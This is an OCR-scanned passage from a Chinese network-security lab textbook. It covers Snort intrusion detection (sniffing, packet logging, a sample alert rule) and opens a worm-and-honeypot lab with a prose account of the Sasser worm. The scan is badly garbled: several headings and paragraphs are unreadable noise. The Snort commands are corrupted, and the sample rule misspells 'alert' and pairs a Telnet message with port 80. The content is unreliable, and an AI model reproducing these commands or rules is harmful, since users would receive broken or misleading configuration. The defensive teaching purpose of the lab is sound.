问题 摆 在 人 们 面前 。 公 司 一 般 采 用 防火 墙 作 为 安全 的 第 一 道 防线 。 而 随 着 攻击 者 技能 的 日 
趋 成 熟 ,攻击 工具 与 手法 的 日 趋 复 杂 多 样 ,单纯 的 防火 墙 策略 已 经 无 法 满足 对 安全 高 度 敏感 
的 部 门 的 需要 ,网络 的 防卫 必须 采用 一 种 纵深 的 、 多 样 的 手段 。 与 此 同时 ,目前 的 网 络 环境 
也 变 得 越 来 越 复 杂 , 各 式 各 样 的 复杂 设备 ,需要 不 断 升级 .补漏 的 系统 使 得 网 络 管理 员 的 工 
作 不 断 加 重 ,不 经 意 的 玻 忽 便 有 可 能 造成 重大 的 安全 隐患 。 在 这 种 情况 下 ,入 侵 检测 系统 
IDS(Intrusion Detection System) 就 成 了 构建 网 络 安全 体系 中 不 可 或 缺 的 组 成 部 分 。 入 侵 
检测 系统 就 是 依照 一 定 的 安全 策略 ,通过 软 、 硬 件 , 对 网 络 . 系 统 的 运行 状况 进行 监视 , 尽 可 
能 发 现 各 种 攻击 企图 .攻击 行为 或 者 攻击 结果 ,以 保证 网 络 系统 资源 的 机 密 性 、 完 整 性 和 可 
用 性 。 做 一 个 形象 的 比喻 ,假如 防火 墙 是 一 幢 大 楼 的 门 锁 , 那 么 IDS 就 是 这 幢 大 楼 里 的 监视 
系统 。 一 旦 小 偷 候 窗 进入 大 楼 ,或 内 部 人 员 有 越界 行为 ,只 有 实时 监视 系统 才能 发 现 情况 并 
发 出 警告 。 

入 侵 检 测 可 分 为 实时 人 侵 检测 和 事后 和 人 侵 检测 两 种 。 实 时 人 侵 检 测 在 网 络 连接 过 程 中 
进行 ,系统 根据 用 户 的 历史 行为 模型 .存储 在 计算 机 中 的 专家 知识 以 及 神经 网 络 模型 对 用 户 
当前 的 操作 进行 判断 ,一 旦 发 现 和 人 侵 迹 象 立即 断 开 入侵 者 与 主机 的 连接 ,并 收集 证 据 和 实施 
数据 恢复 。 这 个 检测 过 程 是 不 断 循环 进行 的 ;而 事后 入 侵 检测 则 是 由 具有 网 络 安全 专业 知 
识 的 网 络 管理 人 员 来 进行 的 ,是 管理 员 定 期 或 不 定期 进行 的 ,不 具有 实时 性 ,因此 防御 入 侵 
的 能 力 不 如 实时 入 侵 检测 系统 。 


第 人 3 章 ”基于 网 络 入 侵 检测 系统 


按 入 侵 检测 的 手段 ,入 侵 检 测 模型 可 分 为 基于 主机 和 基于 网 络 两 种 。 

1. 基于 主机 模型 

基于 主机 模型 也 称 基 于 系统 的 模型 , 它 是 通过 分 析 系 统 的 审计 数据 来 发 现 可 疑 的 活动 ， 
如 内 存 和 文件 的 变化 等 。 其 输入 数据 主要 来 源 于 系统 的 审计 日 志 , 一 般 只 能 检测 该 主机 上 
发 生 的 入 侵 。 这 种 模型 有 以 下 优点 。 

(1) 性 能 价格 比 高 。 在 主机 数量 较 少 的 情况 下 ,这 种 方法 的 性 能 价格 比 可 能 更 高 。 

(2) 更 加 细致 。 这 种 方法 可 以 很 容易 地 监测 一 些 活动 ,如 对 敏感 文件 .目录 ,程序 或 端 
口 的 存 取 , 而 这 些 活 动 很 难 在 基于 协议 的 线索 中 发 现 。 

(3) 视野 集中 。 一 旦 入 侵 者 得 到 了 一 个 主机 用 户 名 和 口令 ,基于 主机 的 代理 是 最 有 可 
能 区 分 正常 活动 和 非法 活动 的 。 

(D 易于 用 户 剪裁 。 每 一 个 主机 有 其 自己 的 代理 ,当然 用 户 剪裁 更 方便 了 。 

(5) 较 少 的 主机 。 基 于 主机 的 方法 有 时 不 需要 增加 专门 的 硬件 平台 。 

(6) 对 网 络 流量 不 敏感 。 用 代理 的 方式 一 般 不 会 因为 网 络 流量 的 增加 而 丢掉 对 网 络 行 
为 的 监视 。 

2. 基于 网 络 模型 

基于 网 络 模型 即 通 过 连接 在 网 络 上 的 站 点 捕获 网 上 的 包 , 并 分 析 其 是 否 具 有 已 知 的 攻 
击 模式 ,以 此 来 判别 是 否 为 人 侵 者 。 当 该 模型 发 现 某 些 可 疑 的 现象 时 也 一 样 会 产生 告警 ,并 
会 向 一 个 中 心 管理 站 点 发 出 “告警 "信号 。 基 于 网 络 的 检测 有 以 下 优点 。 

(1) 侦 测速 度 快 。 基 于 网 络 的 监测 器 通常 能 在 微 秒 或 秒 级 时 间 内 发 现 问题 。 而 大 多 数 
基于 主机 的 产品 则 要 依靠 对 最 近 几 分 钟 内 审计 记录 的 分 析 。 

(2) 隐蔽 性 好 。 一 个 网 络 上 的 监测 器 不 像 一 个 主机 那样 显眼 和 易 被 存 取 , 因 而 也 不 那 
么 容易 遭受 攻击 。 由 于 不 是 主机 ,因此 一 个 基于 网 络 的 监视 器 不 用 去 响应 ping ,不 允许 别 
人 存 取 其 本 地 存储 器 ,不 能 让 别人 运行 程序 ,而 且 不 让 多 个 用 户 使 用 它 。 

(3) 视野 更 宽 。 基 于 网 络 的 方法 甚至 可 以 作用 在 网 络 的 边缘 上 , 即 攻击 者 还 没 能 接 和 人 
网 络 时 就 被 制止 。 

(4) 较 少 的 监测 器 。 由 于 使 用 一 个 监测 器 就 可 以 保护 一 个 共享 的 网 段 , 所 以 不 需要 很 
多 的 监测 器 。 相 反 地 ,如 果 基于 主机 , 则 在 每 个 主机 上 都 需要 一 个 代理 ,这 样 的 话 ,花费 昂 
贵 ,而 且 难 以 管理 。 但 是 ,如 果 在 一 个 交换 环境 下 ,每 个 主机 就 得 配备 一 个 监测 器 ,因为 每 个 
主机 都 在 自己 的 网 段 上 。 

O 占用 资源 少 。 在 被 保护 的 设备 上 不 用 占用 任何 资源 。 这 两 种 模型 具有 互补 性 , 基 
于 网 络 的 模型 能 够 客观 地 反映 网 络 活动 ,特别 是 能 够 监视 到 主机 系统 审计 的 盲区 ;而 基于 主 
机 的 模型 能 够 更 加 精确 地 监视 主机 中 的 各 种 活动 。 基 于 网 络 的 模型 受 交 换 网 的 限制 ,只 能 
监控 同一 监控 点 的 主机 ,而 基于 主机 模型 装 有 IDS 的 监控 主机 可 以 对 同一 监控 点 内 的 所 有 
主机 进行 监控 。 


13.3.2 snort 介绍 


snort IDS( 入 侵 检 测 系统 ) 是 一 个 强大 的 网 络 人 侵 检测 系统 。 它 具有 实时 数据 流量 分 
析 和 记录 IP 网 络 数 据 包 的 能 力 , 能 够 进行 协议 分 析 , 对 网 络 数据 包 内 容 进 行 搜索 和 匹配 。 
它 能 够 检测 各 种 不 同 的 攻击 方式 ,对 攻击 进行 实时 报警 。 此 外 ,snort 是 开源 的 入 侵 检 测 系 
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统 , 并 具有 很 好 的 可 扩展 性 和 可 移植 性 。 

snort 能 够 对 网 络 上 的 数据 包 进 行 抓 包 分 析 , 但 区 别 于 其 他 嗅 探 器 的 是 , 它 能 根据 所 定 
义 的 规则 进行 响应 及 处 理 。snort 通过 对 获取 的 数据 包 ,进行 各 规则 的 分 析 后 ,根据 规则 链 ， 
可 采取 Activation( 报 警 并 启动 另外 一 个 动态 规则 链 )、 Dynamic( 由 其 他 的 规则 包 调 用 )、 
Alert( 报 警 )、Pass( 忽 略 )、Log( 不 报警 但 记录 网 络 流量 )5 种 响应 的 机 制 。 

snort 有 数据 包 嗅 探 、 数 据 包 分 析 、 数 据 包 检测 、 响 应 处 理 等 多 种 功能 ,每 个 模块 实现 不 
同 的 功能 ,各 模块 都 是 用 插件 的 方式 和 snort 相 结 合 , 功 能 扩展 方便 。 例 如, 预 处 理 插件 的 
功能 就 是 在 规则 匹配 误 用 检测 之 前 运行 ,完成 TIP 碎片 重组 http 解码 .Telnet 解码 等 功 
能 ,处 理 持 件 完成 检查 协议 各 字段 .关闭 连接 、 攻 击 响应 等 功能 ,输出 插件 将 处 理 后 的 各 种 情 
况 以 日 志 或 警告 的 方式 输出 。snort IDS 体系 结构 如 图 13. 1 ras. 


© © 
数据 包 预 处 报警 / 日 志文 件 / 
网 络 嗅 探 理 器 日 志 数据 库 
数据 包 © O) 


形成 规则 链 


规则 库 / 攻 击 
签名 


图 13.1 snort IDS 体系 结构 


图 13. 1 snort 的 结构 由 四 大 软件 模块 组 成 ,它们 的 功能 分 别 如 下 。 

CD 数据 包 嗅 探 模块 。 负 责 监听 网 络 数据 包 .对 网 络 进行 分 析 。 

(2) 预 处 理 模块 。 该 模块 用 相应 的 插件 来 检查 原始 数据 包 , 从 中 发 现 原始 数据 的 “ 行 
为 ”, 如 端口 扫描 ,IP 碎片 等 ,数据 包 经 过 预 处 理 后 才 传 到 检测 引擎 。 

(3) 检测 模块 。 该 模块 是 snort 的 核心 模块 。 当 数据 包 从 预 处 理 器 送 过 来 后 ,检测 引擎 
依据 预先 设置 的 规则 检查 数据 包 , 一 旦 发 现 数据 包 中 的 内 容 和 某 条 规则 相 匹 配 ,就 通知 报警 
模块 。 

(4) 报警 /日 志 模块 。 经 检测 引擎 检查 后 的 snort 数据 需要 以 某 种 方式 输出 。 如 果 检 测 
引擎 中 的 某 条 规则 被 匹配 , 则 会 触发 一 条 报警 ,这 条 报警 信息 会 通过 网 络 `UNIX socket, 
Windows Popup( SMB) , SNMP 协议 的 trap 命令 传送 给 日 志文 件 ,甚至 可 以 将 报警 传送 给 
第 三 方 插件 (如 SnortSam) ,另外 报警 信息 也 可 以 记 入 SQL 数据 库 。 


13.4 实验 内 容 
使 用 snort 进行 数据 包 的 嗅 探 .记录 和 分 析 ,并 熟悉 snort 的 一 些 简单 的 报警 规则 。 
13.5 实验 步骤 


本 练习 主机 A.B 为 一 组 。 
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13.5.1 snort 数据 包 嗅 探 


1. 启动 snort 

主机 A 进 入 IDS 工 作 目 录 , 启 动 snort, 运 行 snort 对 网 络 接口 eth0 进行 监听 ,要 求 如 下 。 
CD 仅 捕 获 同 组 主机 发 出 的 icmp 回 显 请 求 数据 包 。 

(2) 采用 详细 模式 在 终端 显示 数据 包 链 路 层 、 应 用 层 信 息 。 

(3) 对 捕获 信息 进行 日 志 记 录 , 日 志 目 录 /var/log/snort。 

snort 命令 为 : 


snort -i eth0 - dev icmp and src 对 方 IP - 1 /var/log/snort 


snort 命令 运行 如 图 13. 2 所 示 。 


文件 (E) WEO SEW 终端 (D) 标签 8) Hew 

[root@ExpNIS ids]# snort -i eth0 -dev icmp and src 172. 16.0.36 -1 /var/log/snort 
Running in packet logging mode 

Log directory = /var/log/snort 


Initializing Network Interface eth0 


一 == Initializing Snort ==— 
Initializing Output Plugins! 
Decoding Ethernet on interface eth0 


一 == Initialization Complete ==-- 
一 让》 Snort! <+- 


Version 2.0.0 (Build 72) 
By Martin Roesch (roeschüsourcefire.com, www. snort. org) 


图 13.2 snort 监听 网 络 接口 eth0 


主机 A 执行 上 述 命令 , 同 组 主机 B 对 当前 主机 进行 ping 探测 。 显 示 结 果 如 图 13. 3 
所 示 。 


文件 (E) 编辑 E) SEV AD FEW 帮助 也 


= 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 =+ 


08/27-17:22:53.437018 0:C:29:2F:2C:6 -> 0:C:29:2:A1:C6 type:0x800 len:0x62 
172.16.0.36 -> 172. 16. 0. 56 ICMP TTL:64 TOS:0x0 ID:15 IpLen:20 DgmLen:84 DF 
Type:8 Code:0 1D:54791  Seq:16 ECHO 

D4 70 1C 52 A5 CB 01 00 08 09 OA OB OC OD OE OF .p.R...........- 

10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D IE IF .......... 

20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 1^s$58" () +, 7. / 

30 31 32 33 34 35 36 37 01234567 


图 13.3 主机 B 进行 ping 探测 


根据 snort 捕获 信息 填写 表 13-1. 

表 13-1 snort 捕获 信息 
数据 帧 源 MAC 
数据 帧 目的 MAC 
IP 上 层 协 议 类 型 
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续 表 
数据 包 源 TP 
数据 包 目 的 IP 
数据 包 总 长 度 
IP 报 文 头 长 度 
ICMP 报 文 头 长 度 
ICMP 负载 长 度 
ICMP 类 型 /代码 


2. 查看 snort 日 志 记 录 
查看 结果 如 图 13.4 所 示 。 


a root@ExpN IS: /opt/ExpNIS/NetAD-Lab/Tools/ ids| 
文件 (E) 编辑 (E) BEY AHO REQ 帮助 外 
Snort analyzed 0 out of 0 packets, . 
Breakdown by protocol: Action Stats: 
(0. 000%) ALERTS: 0 
(0. 000%) LOGGED: 0 
(0. 000%) PASSED: 0 
(0. 000%) 
(0. 000%) 
(0. 000%) 
(0. 000%) 
(0. 000%) 
(0. 000%) 
Breakdown by type: 
Management Packets: 0 (0. 000%) 
Control Packets: 0 (0. 000%) 
Data Packets: 0 (0. 000%) 


图 13.4 snort 日 志 记 录 


说 明 : 默认 snort 日 志 记 录 最 后 一 级 目录 会 以 触发 数据 包 的 源 IP 命名 。 可 按 Ctrl+C 
组 合 键 停止 snort 运行 。 


13.5.2 snort 数据 包 记 录 


snort 拥有 三 大 基本 功能 : 嗅 探 器 .数据 包 记 录 器 和 入 侵 检 测 。 嗅 探 器 模式 仅 从 网 络 上 
读 取 数据 包 , 并 作为 连续 不 断 的 流 显示 在 终端 上 ,常用 命令 snort -dev。 数 据 包 记录 器 模式 
是 把 数据 包 记 录 到 硬盘 上 ,常用 命令 snort -b。 网 络 人 侵 检测 模式 是 最 复杂 的 ,而 且 是 可 配 
置 的 。 可 以 证 snort 分 析 网 络 数据 流 以 匹配 用 户 定 义 的 一 些 规则 ,并 根据 检测 结果 采取 一 
定 的 动作 。 

CD 对 网 络 接口 eth0 进行 监听 , 仅 捕获 同 组 主机 发 出 的 Telnet 请 求 数据 包 , 并 将 捕获 
数据 包 以 二 进 制 方式 存储 到 日 志文 件 中 /var/log/snort/snort. log) 。 

snort 命令 为 : 


snort -i eth0 -b tcp and src 对 方 IP and dst port 23 


具体 操作 如 图 13. 5 和 图 13.6 所 示 。 
(2) 当前 主机 执行 上 述 命 令 , 同 组 主机 Telnet 远程 登录 当前 主机 ,如 图 13.7 所 示 。 
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文件 (E) 编辑 E) EEV SRO FEW 帮助 加 

[root@ExpNIS ids]# snort -i eth0 -b tcp and src 172. 16.0.36 and dst port 23 
Running in packet logging mode 

Log directory - /var/log/snort 


Initializing Network Interface eth0 


= Initializing Snort ==-- 
Initializing Output Plugins! 
Decoding Ethernet on interface eth0 


= Initialization Complete ==— 
—b Snort! <+- 


Version 2.0.0 (Build 72) 
By Martin Roesch (roesch@sourcefire. com, www. snort. org) 


图 13.5 捕获 同 组 主机 Telnet 请 求 数据 包 


[root@ExpNIS ids]& snort -r /var/log/snort/snort. log. 1377595591 

No run mode specified, defaulting to verbose mode 

Running in packet dump mode 

Log directory - /var/log/snort 

TCPDUMP file reading mode. 

Reading network traffic from "/var/log/snort/snort.log. 1377595591" file. 
snaplen - 1514 


图 13.6 将 捕获 数据 包 存储 到 指定 路 径 


文件 (E) 编辑 (E) SEO SHO FEW Hew 


nort analyzed 18 out of 18 packets, dropping 0(0. 000%) packets 


reakdown by protocol: Action Stats: 
: 9 (50. 000%) : 
UDP: 0 (0. 000%) 
ICMP: 0 (0. 000%) 
ARP: 0 (0. 000%) 
EAPOL: 0 (0. 000%) 
IPv6: 0 (0. 000%) 
IPX: 0 (0. 000%) 
OTHER: O (0. 000%) 
ISCARD: 0 (0. 000%) 


图 13.7 停止 捕获 数据 包 


(3) 停止 snort 捕获 ( 按 Ctrl 十 C 组 合 键 ) , 读 取 snort. log 文件 ,查看 数据 包 内 容 , 如 
图 13.8 所 示 。 


— Snort! <+- 

Version 2.0.0 (Build 72) 

By Martin Roesch (roesch@sourcefire. com, www. snort. org) 
08/27-17:30:37.971792 172. 16. 0.36:49806 -> 172. 16. 0. 56:23 
TCP TTL:64 TOS:0x10 ID:40081 IpLe 0 DF 
HpebbRS Seq: OxSDESABCA Ack: Ox0 Win: 0 TcpLen: 40 
TCP Options (5) => MSS: 1460 SackOK TS: 669525 0 NOP AS: 2 


= 本 本 本 本 本 本 村 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 和 =+ 


08/27-17:30:37. 971931 172. 16. 0. 36:49806 -> 172. 16. 0. 56:23 

TCP TTL:64 TOS:0x10 ID:40082 IpLen:20 DgmLen:52 DF 

seer Seq: Ox9DESABCS Ack: Ox910A8B93 Win: 0x5B4 TcpLen: 32 
TCP Options (3) => NOP NOP TS: 669526 736382 


= 本 本 本 本 本 本 本 本 本 本 村 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 本 =+ 


08/27-17:30:37. 998213 172. 16. 0.36:49806 -> 172. 16. 0. 56:23 

TCP TTL:64 TOS:0x10 ID:40083 IpLen:20 DgmLen:85 DF 

aeerAP HR Seq: Ox9DESABCS Ack: Ox910A8B93 Win: 0x5B4 TcpLen: 32 
TCP Options (3) => NOP NOP TS: 669532 736382 

FF FD 26 FF FB 26 FF FD 03 FF FB 18 FF FB IF FF ..&. 
FB 20 FF FB 21 FF FB 22 FF FB 27 FF FD 05 FF FB 

23 = 


13.8 数据 包 内 容 
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13.5.3 简单 报警 规则 


snort 使 用 一 种 简单 的 规则 描述 语言 ,这 种 描述 语言 易于 扩展 ,功能 也 比较 强大 。snort 
规则 是 基于 文本 的 ,规则 文件 按照 不 同 的 组 进行 分 类 ,如 文件 ftp. rules 包含 了 FTP 攻击 


内 容 。 
i£: snort 的 每 条 规则 必须 在 一 行 中 , 它 的 规则 解释 器 无 法 对 跨行 的 规则 进行 解析 。 
snort 的 每 条 规则 都 可 以 分 成 逻辑 上 的 两 个 NS 

部 分 , 即 规则 头 和 规则 体 。 规 则 头 包 括 4 个 部 分 ， i 1 

规则 行为 ;协议 ; 源 信息 ;目的 信息 。 规则 动作 | ”协议 | 源 信息 | 目的 信息 
规则 头 的 描述 如 图 13.9 所 示 。 规则 体 
snort 预 置 的 规则 动作 有 5 种 。 图 13.9 规则 头 的 描述 


(D pass。 动 作 选 项 pass 将 忽略 当前 的 包 , 后 续 捕获 的 包 将 被 继续 分 析 。 

@ log。 动 作 选 项 log 将 按照 自己 配置 的 格式 记录 包 。 

@ alert。 动 作 选 项 alert 将 按照 自己 配置 的 格式 记录 包 , 然 后 进行 报警 。 它 的 功能 强 
大 ,但 是 必须 恰当 运用 ,因为 如 果 报 警 记 录 过 多 ,从 中 搜 取 有 效 信息 的 工作 量 增 大 ,反而 会 使 
安全 防护 工作 变 得 低 效 。 

(D dynamic。 动 作 选 项 dynamic 是 比较 独特 的 一 种 , 它 保持 在 一 种 潜伏 状态 ,直到 
activate 类 型 的 规则 将 其 触发 ,之 后 它 将 像 log 动作 一 样 记 录 数 据 包 。 

© activate。 动 作 选 项 activate 功能 强大 , 当 被 规则 触发 时 生成 报警 ,并 启动 相关 的 
dynamic 类 型 规则 。 在 检测 复杂 的 攻击 或 对 数据 进行 归 类 时 ,该 动作 选项 相当 有 用 。 

(1) 在 snort 规则 集 目 录 ids/rules 下 新 建 snort 规则 集 文 件 new. rules, 对 来 自 外 部 主 
机 的 、 目 标 为 当前 主机 80/tep 端口 的 请 求 数据 包 进 行 报警 ,报警 消息 自 定义 。 

snort 规则 : 


alter tcp any any -> 本 机 IP 80 (msg:"Telnet Login") 
根据 规则 完成 表 13-2 的 填写 。 

表 13-2 snort 规则 集 内 容 
snort 规则 动作 
规则 头 协议 
规则 头 源 信息 
规则 头目 的 信息 
方向 操作 
报警 消息 


(2) 编辑 snort. conf 配置 文件 ,使 其 包含 new. rules 规则 集 文 件 , 具 体操 作 如 下 : 使 用 
vim (BK vi) 编辑 器 打开 snort. conf ,切换 至 编辑 模式 ,在 最 后 添加 新 行 包 含 规则 集 文 件 new. 
rules, 


添加 包含 new. rules 规则 集 文件 语句 : 
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include &RULE PATH/new.rules 
(3) 以 和 人 侵 检测 方式 启动 snort, 进 行 监听 。 
启动 snort 的 命令 : 
snort - c snort.conf 
以 人 侵 检测 方式 启动 snort, 同 组 主机 访问 当前 主机 Web 服务 。 
根据 报警 日 志 (/var/log/snort/alert) 完 成 表 13-3 的 填写 。 
表 13-3 ”报警 日 志 内 容 
报警 名 称 
数据 包 源 IP 
数据 包 目的 IP 
数据 包 源 端口 号 
数据 包 目的 端口 号 


13.6 思考 问题 


. snort 系统 由 哪些 组 件 构成 ? 

. snort 有 哪些 工作 模式 ? 

. snort 人 侵 检测 系统 支持 哪些 报警 输出 ? 

. 说 明 snort 的 功能 和 作用 。 

. 结合 实验 ,分 析 说 明 snort 系统 的 配置 文件 snort. conf. 
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第 14 章 A mi we 
14.1 实验 目的 与 要 求 


。 掌握 蠕 虫 病毒 的 原理 。 

. FREER, 

© 学 会 根据 需求 自制 密 饶 。 

。 RU SERE B DU A s B o 

SE 2] [I SEE E AC AF Sz BILE DL EE o 


14.2 实验 环境 


在 VMWare 虚拟 机 中 安装 操作 系统 Windows 2003, 在 企业 网 络 结构 下 ,每 组 两 人 ,使 
用 Netcat、Snort、UltraEdit-32、Worm_body、Worm_srv TH. 


14.3 背景 知识 


14.3.1 蠕虫 病毒 


蠕虫 病毒 和 一 般 的 计算 机 病毒 有 着 很 大 的 区 别 , 对 于 它 , 现 在 还 没有 一 个 成 套 的 理论 体 
系 ,但 是 一 般 认为 : 蠕虫 病毒 是 一 种 通过 网 络 传播 的 恶性 病毒 , 它 除 具有 病毒 的 一 些 共性 
外 ,同时 具有 自己 的 一 些 特征 ,如 不 利用 文件 寄生 (有 的 只 存在 于 内 存 中 ) 对 网 络 造成 拒绝 服 
务 以 及 与 黑客 技术 相 结 合 等 。 蠕 虫 病毒 主要 的 破坏 方式 是 大 量 的 复制 自身 ,然后 在 网 络 中 
传播 ,严重 地 占用 有 限 的 网 络 资源 ,最 终 引 起 整个 网 络 的 瘫痪 ,使 用 户 不 能 通过 网 络 进 行 正 
常 的 工作 。 每 一 次 蠕虫 病毒 的 爆发 都 会 给 全 球 经 济 造成 巨大 损失 ,因此 它 的 危害 性 是 十 分 
巨大 的 。 有 一 些 蠕虫 病毒 还 具有 更 改 用 户 文件 ,将 用 户 文件 自动 当 附件 转发 的 功能 ,更 是 严 
重地 危害 到 用 户 的 系统 安全 。 

蠕虫 病毒 常见 的 传播 方式 有 两 种 : 

CD 利用 系统 漏洞 传播 。 蠕 虫 病毒 利用 计算 机 系统 的 设计 缺陷 ,通过 网 络 主动 地 将 自 
己 扩散 出 去 。 

(2) 利用 电子 邮件 传播 。 蠕 虫 病毒 将 自己 隐藏 在 电子 邮件 中 , 随 电子 邮件 扩散 到 整个 
网 络 中 ,这 也 是 PC 被 感染 的 主要 途径 。 

蠕虫 病毒 一 般 不 寄生 在 别 的 程序 中 ,而 多 作为 一 个 独立 的 程序 存在 , 它 感 染 的 对 象 是 全 
网 络 中 所 有 的 计算 机 ,并 且 这 种 感染 是 主动 进行 的 ,所 以 总 是 让 人 防不胜防 。 在 现今 全 球 网 
络 高 度 发 达 的 情况 下 ,一 种 蠕虫 病毒 在 几 个 小 时 之 内 草 延 全 球 并 不 是 什么 困难 的 事情 。 

diti UE (Worm. Sasser) 病毒 是 一 种 典型 的 蠕虫 病毒 , 振 功 波 病毒 仅 感染 Windows 


Sum Bux 


2000, Windows XP 操作 系统 。 病 毒 发 作 时 ,在 本 地 开辟 后 门 ,监听 TCP 5554 端口 ,作为 
FTP 服务 器 等 待 远程 控制 命令 ,黑客 可 以 通过 这 个 端口 偷窃 用 户 机 器 的 文件 和 其 他 信息 。 
同时 ,病毒 开辟 128 个 扫描 线程 ,以 本 地 IP 地 址 为 基础 , 取 随 机 IP 地 址 ,疯狂 地 试探 连接 
445 端口 ,试图 利用 Windows 的 LSASS 中 存在 一 个 缓冲 区 溢出 漏洞 进行 攻击 ,一旦 攻击 成 
功 会 导致 对 方 机 器 感染 此 病毒 并 进行 下 一 轮 的 传播 ,攻击 失败 也 会 造成 对 方 机 器 的 缓冲 区 
溢出 ,导致 对 方 机 器 程序 非法 操作 及 系统 异常 等 。 


14.3.2 SEE 


SERE TE — AEK 3e T9 TESEBLAR BE E Je 1129 RS SE V a" A ak Pd E A P3] 
MEAT ALAR SLM A EETERU. SIRE — 4d dig VS i AR AE. COR LB, T 
或 者 多 个 易 受 攻击 的 主机 ,给 攻击 者 提供 一 个 容易 攻击 的 目标 。 由 于 蜜 钢 并 没有 向 外 界 提 
供 真正 有 价值 的 服务 ,因此 所 有 链接 的 尝试 都 将 被 视 为 是 可 疑 的 。 蜜 钠 的 另 一 个 用 途 是 拖 
延 攻 击 者 对 真正 目标 的 攻击 ,让 攻击 者 在 蜜 拼 上 浪费 时 间 。 这 样 ,最初 的 攻击 目标 得 到 了 保 
J^ ,真正 有 价值 的 内 容 没 有 受到 侵犯 。 此 外 , 蜜 缸 也 可 以 为 追踪 攻击 者 提供 有 用 的 线索 ,为 
起 诉 攻 击 者 搜集 有 力 的 证 据 。 从 这 个 意义 上 说 , 蜜 缸 就 是 "诱捕 ”攻击 者 的 一 个 陷阱 。 

蜜 钢 是 一 种 资源 , 它 的 价值 是 被 攻击 或 者 攻陷 ,这 就 意味 着 蜜 钠 是 用 来 被 探测 、 被 攻击 
甚至 最 后 被 攻陷 的 , 蜜 钢 不 会 修补 任何 东西 ,这 样 就 为 使 用 者 提供 了 额外 的 有 价值 的 信息 。 
蜜 钢 不 会 直接 提高 计算 机 网 络 安全 ,但 它 却 是 其 他 安全 策略 所 不 可 蔡 代 的 一 种 主动 防御 技 
术 。 无 论 使 用 者 如 何 建 立 和 使 用 蜜 饶 , 只 有 蜜 饶 受 到 攻击 , 它 的 作用 才能 发 挥 出 来 。 为 了 方 
便 攻击 者 攻击 ,最 好 是 将 蜜 镀 设置 成 域名 服务 器 (DNS)、Web 或 者 电子 邮件 转发 服务 等 流 
行 应 用 中 的 某 一 种 。 


14.3.3 蜜 拨 的 基本 配置 


SEWER 4 种 不 同 的 配置 方式 : 诱骗 服务 .弱化 系统 .强化 系统 和 用 户 模式 服务 器 。 

1. 诱骗 服务 

诱骗 服务 是 指 在 特定 IP 服务 端口 上 侦 听 并 像 其 他 应 用 程序 那样 对 各 种 网 络 请 求 进行 
应 答 的 应 用 程序 , 它 是 蜜 钠 的 基本 配置 。 蜜 钠 的 诱骗 服务 需要 精心 配置 和 设计 ,首先 , 想 要 
将 服务 模拟 得 足以 让 攻击 者 相信 是 一 件 非常 困难 的 事情 , 另 一 个 问题 是 诱骗 服务 只 能 收集 
有 限 的 信息 。 从 理论 上 讲 ,诱骗 服务 本 身 可 以 在 一 定 程 度 上 允许 攻击 者 访问 系统 ,但 是 这 样 
会 带 来 一 定 的 风险 ,如 果 系 统 记录 所 有 蜜 钠 本 身 的 日 志 记 录 , 而 攻击 者 找到 了 攻击 诱骗 服务 
的 方法 , 蜜 炙 就 陷入 失控 状态 ,攻击 者 可 以 奖 入 系统 ,将 所 有 攻击 的 证 据 删 除 ,这 显然 是 很 糟 
糕 的 。 更 糟 的 是 , 蜜 镀 还 有 可 能 成 为 攻击 者 攻击 其 他 系统 的 工具 。 

2. 弱化 系统 

弱化 系统 是 一 个 配置 有 已 知 攻击 弱点 的 操作 系统 ,这 种 配置 的 特点 是 ,恶意 攻击 者 更 容 
易 进 入 系统 ,系统 可 以 收集 有 关 攻 击 的 数据 。 为 了 确保 攻击 者 没有 删除 蜜 缸 的 日 志 记录 , 需 
要 运行 其 他 额外 记录 系统 ,如 syslogd 和 入 侵 检测 系统 等 ,实现 对 日 志 记 录 的 异地 存储 和 
备份 。 

弱化 系统 的 优点 是 蜜 饶 可 以 提供 的 是 攻击 者 试图 入 侵 的 实际 服务 ,这 种 配置 方案 解决 
了 诱骗 服务 需要 精心 配置 的 问题 ,而 且 它 不 限制 蜜 缸 收集 到 的 信息 量 , 只 要 攻击 者 入 侵 蜜 色 
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的 某 项 服务 ,系统 就 会 连续 记录 他 们 的 行为 并 观察 他 们 接 下 来 的 所 有 动作 。 这 样 系统 可 以 
获得 更 多 的 关于 攻击 者 本 身 、 攻 击 方法 和 攻击 工具 方面 的 信息 。 弱 化 系统 的 问题 是 “维护 费 
用 高 但 收益 很 少 ”。 如 果 攻 击 者 对 蜜 缸 使 用 已 知 的 攻击 方法 ,弱化 系统 就 会 变 得 毫 无 意义 ， 
因为 系统 管理 员 已 经 有 防护 这 种 入 侵 方 面 的 经 验 ,并 且 已 经 在 实际 系统 中 针对 该 系统 做 了 
相应 的 修补 。 

3. 强化 系统 

强化 系统 是 对 弱化 系统 配置 的 改进 。 强 化 系统 并 不 配置 一 个 看 似 有 效 的 系统 , 蜜 钢管 
理 员 为 基本 操作 系统 提供 所 有 已 知 的 安全 补丁 ,使 系统 每 个 无 掩饰 的 服务 变 得 足够 安全 。 
一 旦 攻击 者 问 入 “足够 安全 ”的 服务 中 , 蜜 护 就 开始 收集 攻击 者 的 行为 信息 ,一 方面 可 以 为 加 
强 防御 提供 依据 , 另 一 方面 可 以 为 执法 机 关 提 供 证据 。 配 置 强化 系统 是 在 最 短 时 间 内 收集 
最 多 有 效 数据 的 最 好 方法 。 

将 强化 系统 作为 蜜 把 使 用 的 唯一 缺点 是 ,这 种 方法 需要 系统 管理 员 具 有 比 恶意 入 侵 者 
更 高 的 专业 技术 水 平 。 如 果 攻 击 者 具有 更 高 的 技术 能 力 , 就 很 有 可 能 取代 管理 员 对 系统 进 
行 控 制 , 并 掩饰 自己 的 攻击 行为 。 更 糟 的 是 ,他 们 可 能 会 使 用 蜜 饶 进 行 对 其 他 系统 的 攻击 。 

4. 用 户 模式 服务 器 

将 蜜 钠 配 置 为 用 户 模 式 服务 器 是 相对 较 新 的 观点 。 用 户 模 式 服务 器 是 一 个 用 户 进程 ， 
它 运行 在 主机 上 ,并 模拟 成 一 个 功能 健全 的 操作 系统 , 嵌 套 在 主机 操作 系统 的 应 用 程序 空 
间 中 。 

